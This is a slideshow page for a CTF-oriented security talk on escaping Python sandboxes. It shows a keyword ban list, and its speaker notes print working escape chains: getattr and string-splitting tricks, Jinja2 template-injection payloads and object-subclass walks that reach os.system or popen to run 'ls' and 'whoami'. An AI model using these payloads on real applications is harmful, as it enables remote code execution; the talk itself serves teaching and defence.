Successfully reported this slideshow.

Escaping the python sandbox

0

Share

Loading in …3
×
1 of 30
1 of 30

Escaping the python sandbox

0

Share

Download to read offline

There’s two things I really like: Capture the flag competitions and Python.
Fortunately, I have found out that there are challenges that combine both.
In my session I will talk about challenges from 3 different CTF competitions and about the upgraded challenges I wrote from PwCTF.
I will explain the difficulties of creating Python Sandbox and I will show the security issues in the wild.

Things you will learn from my session:
* Why Python Sandbox is a bad idea
* How to exploit Python Sandbox using knowledge of Python language to execute code remotely
* Why it’s hard to protect Python from code execution using Web Application Firewall
* At the end of the session you will get 3 pySandbox challenges to solve in order to check your abilities

There’s two things I really like: Capture the flag competitions and Python.
Fortunately, I have found out that there are challenges that combine both.
In my session I will talk about challenges from 3 different CTF competitions and about the upgraded challenges I wrote from PwCTF.
I will explain the difficulties of creating Python Sandbox and I will show the security issues in the wild.

Things you will learn from my session:
* Why Python Sandbox is a bad idea
* How to exploit Python Sandbox using knowledge of Python language to execute code remotely
* Why it’s hard to protect Python from code execution using Web Application Firewall
* At the end of the session you will get 3 pySandbox challenges to solve in order to check your abilities

More Related Content

Related Books

Free with a 14 day trial from Scribd

See all

Related Audiobooks

Free with a 14 day trial from Scribd

See all

Escaping the python sandbox

  1. 1. $ • • • • • @realgam3 • https://linkedin.com/in/realgam3 • https://github.com/realgam3
  2. 2. Objects
  3. 3. from __future__ import print_function targets = __builtins__.__dict__.keys() targets.remove('raw_input') targets.remove('print') for x in targets: del __builtins__.__dict__[x]
  4. 4. banned = [ "import", "exec", "eval", "pickle", "os", "subprocess", "kevin sucks", "input", "banned", "cry sum more", "sys" ]
  5. 5. https://Links • http://pyconil2018.realgame.co.il • https://www.digitalwhisper.co.il/files/Zines/0x5A/DW90- 5-PySandbox.pdf • https://github.com/vstinner/pysandbox • https://nvisium.com/blog/2016/03/09/exploring-ssti-in- flask-jinja2.html
  6. 6. If You Really Like CTF Challenges

Editor's Notes

  • My name is Tomer Zait and I'm a security researcher on F5 Networks.
    I’m practical software engineer and offensive security expert.
    I Love CTF'S and writing open source software's.

    By The Way Your are welcome to contribute code, or follow me in twitter or github.
  • Secure Pyshell:
    print('')
    print("")
    print(".")
    print(open)
    print(__file__)
    print(open(__file__))
    print(getattr(open(__file__),"read"))
    print(getattr(open(__file__),"read")())

    print(__builtins__)
    print(dir(__builtins__))
    print(getattr(__builtins__,"vars"))
    print(getattr(__builtins__,"va"+"rs"))
    print(getattr(__builtins__,"va"+"rs")())
    print(getattr(__builtins__,"va"+"rs")())
    print(getattr(__builtins__,"va"+"rs")()["os"])
    print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system"))
    print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")("ls"))
  • Zumbo 3:
    {{1+1}}
    {{request.environ}}
    {{config}}
    {%set a = 1+2%}{{a}}
    {{config.__class__.__init__.__globals__}}
    {{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

    {{[].__class__.__base__.__subclasses__()}}
    {{[].__class__.__base__.__subclasses__()[351]}}
    {%25set c=[].__class__.__base__.__subclasses__()[351]('realgame.co.il',80)%25}{%25set r=c.request('GET', '/pysandbox.html')%25}{{c.getresponse().read()}}

    http://urllib3.readthedocs.io/en/latest/reference/#urllib3.connectionpool.HTTPConnectionPool
    https://stackoverflow.com/questions/20646822/how-to-serve-static-files-in-flask
  • print("".__class__.__mro__)
    print("".__class__.__mro__[-1].__subclasses__())
    print([t.__name__ for t in "".__class__.__mro__[-1].__subclasses__()].index('WarningMessage'))
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__)
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals)
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"])
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['os'])
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'])
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])
    print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])('whoami')
  • Ask
    “What are the actual alternatives that omer simpson has”?
  • ×